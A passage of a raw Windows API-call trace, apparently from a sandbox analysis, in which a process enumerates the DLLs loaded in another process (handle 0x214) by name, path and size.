[0068.533] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb1a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msiltcfg.dll") returned 0xc [0068.540] CoTaskMemFree (pv=0xd910e0) [0068.541] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.541] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb1a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll")) returned 0x20 [0068.547] CoTaskMemFree (pv=0xd910e0) [0068.548] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef71d0000, lpmodinfo=0x25aaa88, cb=0x18 | out: lpmodinfo=0x25aaa88*(lpBaseOfDll=0x7fef71d0000, SizeOfImage=0x21000, EntryPoint=0x7fef71d73a0)) returned 1 [0068.554] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.554] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef71d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="UIAnimation.dll") returned 0xf [0068.561] CoTaskMemFree (pv=0xd910e0) [0068.561] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.561] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef71d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll")) returned 0x23 [0068.570] CoTaskMemFree (pv=0xd910e0) [0068.570] GetModuleInformation (in: hProcess=0x214, hModule=0x779f0000, lpmodinfo=0x25acc58, cb=0x18 | out: lpmodinfo=0x25acc58*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0068.577] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.577] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x779f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PSAPI.DLL") returned 0x9 [0068.585] CoTaskMemFree (pv=0xd910e0) [0068.586] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.586] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x779f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PSAPI.DLL" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0068.593] CoTaskMemFree (pv=0xd910e0) [0068.593] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7030000, lpmodinfo=0x25aee18, cb=0x18 | out: lpmodinfo=0x25aee18*(lpBaseOfDll=0x7fef7030000, SizeOfImage=0x19c000, EntryPoint=0x7fef7031030)) returned 1 [0068.600] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.600] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7030000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NetworkExplorer.dll") returned 0x13 [0068.607] CoTaskMemFree (pv=0xd910e0) [0068.607] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.607] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7030000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NetworkExplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll")) returned 0x27 [0068.614] CoTaskMemFree (pv=0xd910e0) [0068.614] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9230000, lpmodinfo=0x25b0ff8, cb=0x18 | out: lpmodinfo=0x25b0ff8*(lpBaseOfDll=0x7fef9230000, SizeOfImage=0x3b000, EntryPoint=0x7fef92322f0)) returned 1 [0068.621] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.621] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9230000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINMM.dll") returned 0x9 [0068.629] CoTaskMemFree (pv=0xd910e0) [0068.629] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.629] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9230000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINMM.dll" (normalized: "c:\\windows\\system32\\winmm.dll")) returned 0x1d [0068.636] CoTaskMemFree (pv=0xd910e0) [0068.636] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6ff0000, lpmodinfo=0x25b31b8, cb=0x18 | out: lpmodinfo=0x25b31b8*(lpBaseOfDll=0x7fef6ff0000, SizeOfImage=0x3b000, EntryPoint=0x7fef7017600)) returned 1 [0068.643] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.643] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6ff0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wdmaud.drv") returned 0xa [0068.650] CoTaskMemFree (pv=0xd910e0) [0068.650] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.650] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6ff0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv")) returned 0x1e [0068.657] CoTaskMemFree (pv=0xd910e0) [0068.657] GetModuleInformation (in: hProcess=0x214, hModule=0x741d0000, lpmodinfo=0x25b5378, cb=0x18 | out: lpmodinfo=0x25b5378*(lpBaseOfDll=0x741d0000, SizeOfImage=0x6000, EntryPoint=0x741d1010)) returned 1 [0068.666] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.666] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x741d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ksuser.dll") returned 0xa [0068.673] CoTaskMemFree (pv=0xd910e0) [0068.673] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.673] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x741d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll")) returned 0x1e [0068.680] CoTaskMemFree (pv=0xd910e0) [0068.680] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb710000, lpmodinfo=0x25b7538, cb=0x18 | out: lpmodinfo=0x25b7538*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0068.687] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.687] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0068.696] CoTaskMemFree (pv=0xd910e0) [0068.696] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.696] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0068.703] CoTaskMemFree (pv=0xd910e0) [0068.703] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6fa0000, lpmodinfo=0x25b96f8, cb=0x18 | out: lpmodinfo=0x25b96f8*(lpBaseOfDll=0x7fef6fa0000, SizeOfImage=0x4f000, EntryPoint=0x7fef6fa2760)) returned 1 [0068.710] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.710] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6fa0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AUDIOSES.DLL") returned 0xc [0068.717] CoTaskMemFree (pv=0xd910e0) [0068.718] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.718] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6fa0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AUDIOSES.DLL" (normalized: "c:\\windows\\system32\\audioses.dll")) returned 0x20 [0068.725] CoTaskMemFree (pv=0xd910e0) [0068.725] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6f90000, lpmodinfo=0x25bb8c8, cb=0x18 | out: lpmodinfo=0x25bb8c8*(lpBaseOfDll=0x7fef6f90000, SizeOfImage=0xa000, EntryPoint=0x7fef6f949f0)) returned 1 [0068.733] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.733] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6f90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msacm32.drv") returned 0xb [0068.740] CoTaskMemFree (pv=0xd910e0) [0068.740] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.740] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6f90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv")) returned 0x1f [0068.748] CoTaskMemFree (pv=0xd910e0) [0068.748] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6f70000, lpmodinfo=0x25bda88, cb=0x18 | out: lpmodinfo=0x25bda88*(lpBaseOfDll=0x7fef6f70000, SizeOfImage=0x18000, EntryPoint=0x7fef6f71060)) returned 1 [0068.755] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.755] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6f70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSACM32.dll") returned 0xb [0068.763] CoTaskMemFree (pv=0xd910e0) [0068.763] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.763] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6f70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSACM32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll")) returned 0x1f [0068.779] CoTaskMemFree (pv=0xd910e0) [0068.779] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6f60000, lpmodinfo=0x25bfc48, cb=0x18 | out: lpmodinfo=0x25bfc48*(lpBaseOfDll=0x7fef6f60000, SizeOfImage=0x9000, EntryPoint=0x7fef6f62f98)) returned 1 [0068.787] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.787] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6f60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="midimap.dll") returned 0xb [0068.794] CoTaskMemFree (pv=0xd910e0) [0068.794] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.794] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6f60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll")) returned 0x1f [0068.803] CoTaskMemFree (pv=0xd910e0) [0068.803] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbab0000, lpmodinfo=0x25c1e08, cb=0x18 | out: lpmodinfo=0x25c1e08*(lpBaseOfDll=0x7fefbab0000, SizeOfImage=0x43000, EntryPoint=0x7fefbab30d8)) returned 1 [0068.811] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.811] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbab0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="stobject.dll") returned 0xc [0068.820] CoTaskMemFree (pv=0xd910e0) [0068.820] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.820] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbab0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll")) returned 0x20 [0068.827] CoTaskMemFree (pv=0xd910e0) [0068.828] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9f0000, lpmodinfo=0x25c3ff0, cb=0x18 | out: lpmodinfo=0x25c3ff0*(lpBaseOfDll=0x7fefb9f0000, SizeOfImage=0xba000, EntryPoint=0x7fefb9f115c)) returned 1 [0068.835] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.835] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="BatMeter.dll") returned 0xc [0068.843] CoTaskMemFree (pv=0xd910e0) [0068.843] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.843] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\BatMeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll")) returned 0x20 [0068.856] CoTaskMemFree (pv=0xd910e0) [0068.856] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb00000, lpmodinfo=0x23d7990, cb=0x18 | out: lpmodinfo=0x23d7990*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0068.864] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.864] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0068.872] CoTaskMemFree (pv=0xd910e0) [0068.872] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.872] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0068.880] CoTaskMemFree (pv=0xd910e0) [0068.880] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb910000, lpmodinfo=0x23d9b60, cb=0x18 | out: lpmodinfo=0x23d9b60*(lpBaseOfDll=0x7fefb910000, SizeOfImage=0x69000, EntryPoint=0x7fefb911198)) returned 1 [0068.887] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.887] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="prnfldr.dll") returned 0xb [0068.895] CoTaskMemFree (pv=0xd910e0) [0068.896] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.896] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll")) returned 0x1f [0068.903] CoTaskMemFree (pv=0xd910e0) [0068.903] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb890000, lpmodinfo=0x23dbd20, cb=0x18 | out: lpmodinfo=0x23dbd20*(lpBaseOfDll=0x7fefb890000, SizeOfImage=0x71000, EntryPoint=0x7fefb8cecc4)) returned 1 [0068.914] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.914] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb890000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSPOOL.DRV") returned 0xc [0068.924] CoTaskMemFree (pv=0xd910e0) [0068.924] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.924] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb890000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSPOOL.DRV" (normalized: "c:\\windows\\system32\\winspool.drv")) returned 0x20 [0068.934] CoTaskMemFree (pv=0xd910e0) [0068.934] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb2a0000, lpmodinfo=0x23ddef0, cb=0x18 | out: lpmodinfo=0x23ddef0*(lpBaseOfDll=0x7fefb2a0000, SizeOfImage=0x67000, EntryPoint=0x7fefb2b6060)) returned 1 [0068.945] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.945] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="es.dll") returned 0x6 [0068.953] CoTaskMemFree (pv=0xd910e0) [0068.953] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.953] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")) returned 0x1a [0068.961] CoTaskMemFree (pv=0xd910e0) [0068.961] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6be0000, lpmodinfo=0x23e00a0, cb=0x18 | out: lpmodinfo=0x23e00a0*(lpBaseOfDll=0x7fef6be0000, SizeOfImage=0x74000, EntryPoint=0x7fef6c154c8)) returned 1 [0068.972] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.972] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6be0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dxp.dll") returned 0x7 [0068.983] CoTaskMemFree (pv=0xd910e0) [0068.983] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.983] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6be0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dxp.dll" (normalized: "c:\\windows\\system32\\dxp.dll")) returned 0x1b [0068.993] CoTaskMemFree (pv=0xd910e0) [0068.993] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb870000, lpmodinfo=0x23e2250, cb=0x18 | out: lpmodinfo=0x23e2250*(lpBaseOfDll=0x7fefb870000, SizeOfImage=0x16000, EntryPoint=0x7fefb871050)) returned 1 [0069.001] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.001] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb870000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Syncreg.dll") returned 0xb [0069.009] CoTaskMemFree (pv=0xd910e0) [0069.009] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.009] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb870000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll")) returned 0x1f [0069.018] CoTaskMemFree (pv=0xd910e0) [0069.018] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb20000, lpmodinfo=0x23e4410, cb=0x18 | out: lpmodinfo=0x23e4410*(lpBaseOfDll=0x7fefbb20000, SizeOfImage=0xb000, EntryPoint=0x7fefbb21030)) returned 1 [0069.026] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.026] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ehSSO.dll") returned 0x9 [0069.034] CoTaskMemFree (pv=0xd910e0) [0069.035] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.035] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll")) returned 0x1a [0069.043] CoTaskMemFree (pv=0xd910e0) [0069.043] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6950000, lpmodinfo=0x23e65c8, cb=0x18 | out: lpmodinfo=0x23e65c8*(lpBaseOfDll=0x7fef6950000, SizeOfImage=0x28b000, EntryPoint=0x7fef6956f5c)) returned 1 [0069.052] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.052] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6950000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netshell.dll") returned 0xc [0069.061] CoTaskMemFree (pv=0xd910e0) [0069.061] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.061] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6950000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")) returned 0x20 [0069.070] CoTaskMemFree (pv=0xd910e0) [0069.071] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb270000, lpmodinfo=0x23e8798, cb=0x18 | out: lpmodinfo=0x23e8798*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0069.078] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.078] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb270000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0069.087] CoTaskMemFree (pv=0xd910e0) [0069.087] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.087] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb270000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0069.096] CoTaskMemFree (pv=0xd910e0) [0069.096] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x23ea968, cb=0x18 | out: lpmodinfo=0x23ea968*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0069.104] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.104] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0069.112] CoTaskMemFree (pv=0xd910e0) [0069.112] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.112] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0069.120] CoTaskMemFree (pv=0xd910e0) [0069.121] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb260000, lpmodinfo=0x23ed348, cb=0x18 | out: lpmodinfo=0x23ed348*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0069.130] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.130] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0069.138] CoTaskMemFree (pv=0xd910e0) [0069.138] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.138] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0069.147] CoTaskMemFree (pv=0xd910e0) [0069.147] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb3f0000, lpmodinfo=0x23ef508, cb=0x18 | out: lpmodinfo=0x23ef508*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0069.155] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.155] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0069.164] CoTaskMemFree (pv=0xd910e0) [0069.164] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.164] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0069.174] CoTaskMemFree (pv=0xd910e0) [0069.174] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb860000, lpmodinfo=0x23f16c8, cb=0x18 | out: lpmodinfo=0x23f16c8*(lpBaseOfDll=0x7fefb860000, SizeOfImage=0x10000, EntryPoint=0x7fefb8695dc)) returned 1 [0069.182] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.182] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb860000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AltTab.dll") returned 0xa [0069.197] CoTaskMemFree (pv=0xd910e0) [0069.197] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.197] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb860000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll")) returned 0x1e [0069.206] CoTaskMemFree (pv=0xd910e0) [0069.206] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6930000, lpmodinfo=0x23f3888, cb=0x18 | out: lpmodinfo=0x23f3888*(lpBaseOfDll=0x7fef6930000, SizeOfImage=0x20000, EntryPoint=0x7fef6931298)) returned 1 [0069.214] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.214] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6930000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wpdshserviceobj.dll") returned 0x13 [0069.223] CoTaskMemFree (pv=0xd910e0) [0069.223] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.223] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6930000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wpdshserviceobj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll")) returned 0x27 [0069.232] CoTaskMemFree (pv=0xd910e0) [0069.232] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef68f0000, lpmodinfo=0x23f5a68, cb=0x18 | out: lpmodinfo=0x23f5a68*(lpBaseOfDll=0x7fef68f0000, SizeOfImage=0x39000, EntryPoint=0x7fef68f1240)) returned 1 [0069.245] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.245] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef68f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PortableDeviceTypes.dll") returned 0x17 [0069.256] CoTaskMemFree (pv=0xd910e0) [0069.257] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.257] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef68f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll")) returned 0x2b [0069.269] CoTaskMemFree (pv=0xd910e0) [0069.269] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef92e0000, lpmodinfo=0x23f7c58, cb=0x18 | out: lpmodinfo=0x23f7c58*(lpBaseOfDll=0x7fef92e0000, SizeOfImage=0xbd000, EntryPoint=0x7fef92e1ea4)) returned 1 [0069.280] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.280] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef92e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PortableDeviceApi.dll") returned 0x15 [0069.292] CoTaskMemFree (pv=0xd910e0) [0069.293] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.293] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef92e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll")) returned 0x29 [0069.302] CoTaskMemFree (pv=0xd910e0) [0069.302] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x23f9e48, cb=0x18 | out: lpmodinfo=0x23f9e48*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0069.310] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.310] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0069.319] CoTaskMemFree (pv=0xd910e0) [0069.320] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.320] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0069.331] CoTaskMemFree (pv=0xd910e0) [0069.331] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb4e0000, lpmodinfo=0x23fc018, cb=0x18 | out: lpmodinfo=0x23fc018*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0069.342] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.342] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb4e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0069.354] CoTaskMemFree (pv=0xd910e0) [0069.355] 